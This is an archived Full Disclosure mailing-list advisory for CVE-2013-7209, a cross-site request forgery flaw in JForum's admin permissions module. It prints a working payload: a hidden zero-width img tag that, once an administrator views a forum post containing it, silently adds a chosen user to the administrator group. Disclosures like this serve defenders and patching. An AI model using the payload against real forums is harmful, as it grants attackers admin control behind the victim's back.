|
Full Disclosure
mailing list archives
[CVE-2013-7209]JForum CSRF(Cross-site request forgery) Vulnerability
From: arno <arno.chen () dbappsecurity com cn>
Date: Thu, 26 Dec 2013 17:03:58 +0800
Version : All
Vulnerability : Cross-site request forgery
Problem type : remote
CVE ID : CVE-2013-7209
Jforum Admin module, modify user permissions module exists crsf Vulnerability,use the following code into jforum
forum posts, as long as this administrators is opened this post, the permissions of user with id 12696 will be
Escalated to the group with id 2 permissions,default group with id 2 is administrator group.
Code:
<img src=http://www.target.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2
width=0 />
Code Description:
http://www.target.com/forum/ jforum forum address,
12696 for the user id
2 group id
width=0 is used to hide pic
It was discovered by arno @dbappsecurity.com.cn _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
- [CVE-2013-7209]JForum CSRF(Cross-site request forgery) Vulnerability arno (Dec 26)
|
